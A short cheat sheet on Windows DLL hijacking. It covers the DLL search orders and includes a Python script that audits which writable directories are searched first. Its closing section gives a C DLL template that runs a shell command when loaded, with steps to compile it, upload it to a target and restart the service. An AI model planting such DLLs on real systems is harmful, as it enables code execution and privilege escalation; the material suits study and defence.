DLL Hijacking
Basics
Search Orders
- With SafeDllSearchMode enabled, paths are searched in the following order:
  - Directory of the executable
  - System directory (GetSystemDirectory)
  - 16-bit system directory
  - Windows directory (GetWindowsDirectory)
  - Current working directory (pwd)
  - PATH environment variable
- With SafeDllSearchMode disabled, paths are searched in the following order:
  - Directory of the executable
  - Current working directory (pwd)
  - System directory
  - 16-bit system directory
  - Windows directory
  - PATH environment variable
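The two orders above decide which copy of a DLL is loaded. The following added example (not part of the original notes) models them in Python so a defender can check which writable directories are searched before the legitimate copy. The directory names, the file listing and the DLL name `helper.dll` are constructed sample data.

```python
# Added example: models the two search orders listed above.
# Paths, file listing and DLL name are constructed sample data.

def _norm(d):
    return d.rstrip("\\").lower()  # Windows paths are case-insensitive

def search_order(app_dir, cwd, path_env, safe_mode=True,
                 system_dir=r"C:\Windows\System32",
                 system16_dir=r"C:\Windows\System",
                 windows_dir=r"C:\Windows"):
    """Return search directories in the order the notes list them."""
    system_dirs = [system_dir, system16_dir, windows_dir]
    path_dirs = [p for p in path_env.split(";") if p]
    if safe_mode:
        order = [app_dir] + system_dirs + [cwd] + path_dirs
    else:
        order = [app_dir, cwd] + system_dirs + path_dirs
    seen, result = set(), []
    for d in order:  # drop duplicates, keep first occurrence
        if _norm(d) not in seen:
            seen.add(_norm(d))
            result.append(d)
    return result

def audit(dll, order, listing, writable):
    """Return (dir that resolves dll or None, writable dirs searched earlier)."""
    files = {_norm(d): {f.lower() for f in fs} for d, fs in listing.items()}
    writable = {_norm(d) for d in writable}
    earlier = []
    for d in order:
        if dll.lower() in files.get(_norm(d), set()):
            return d, earlier
        if _norm(d) in writable:
            earlier.append(d)
    return None, earlier  # never resolved: every writable dir was probed

# Constructed sample: service in C:\Svc started with C:\Work as current dir.
LISTING = {r"C:\Windows\System32": {"helper.dll"}}
WRITABLE = [r"C:\Work", r"C:\Temp"]

if __name__ == "__main__":
    for safe in (True, False):
        order = search_order(r"C:\Svc", r"C:\Work", r"C:\Temp", safe)
        print("safe" if safe else "unsafe", audit("helper.dll", order, LISTING, WRITABLE))
```

In the sample, the writable current directory is only searched ahead of the System32 copy when SafeDllSearchMode is disabled; a DLL that is never resolved is probed in every writable directory in both modes.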
Template
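```c
#include <windows.h>
#include <stdlib.h> /* system() */

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    /* Runs once, when the DLL is mapped into the loading process */
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
```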
- Compilation via
  x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
- Upload to target
- Restart the DLL service via
  sc stop dllsvc
  sc start dllsvc